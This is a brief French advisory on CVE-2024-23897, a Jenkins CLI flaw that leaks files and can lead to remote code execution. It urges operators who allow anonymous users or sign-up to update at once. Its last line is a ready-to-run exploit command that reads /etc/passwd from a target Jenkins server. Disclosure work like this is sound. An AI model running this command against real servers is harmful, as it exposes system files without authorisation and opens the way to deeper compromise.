
CVE-2024-23897 jenkins-cli
CVE-2024-23897 jenkins-cli
Nous avons vu que Jenkins File Leak / RCE (CVE-2024-23897) a été exploité dans la nature et nous avons réussi à le reproduire. Si votre Jenkins autorise les utilisateurs anonymes ou l'enregistrement d'utilisateurs, mettez-le immédiatement à jour vers la dernière version.
java -jar jenkins-cli.jar -s https://www.wevul.com @/etc/passwd
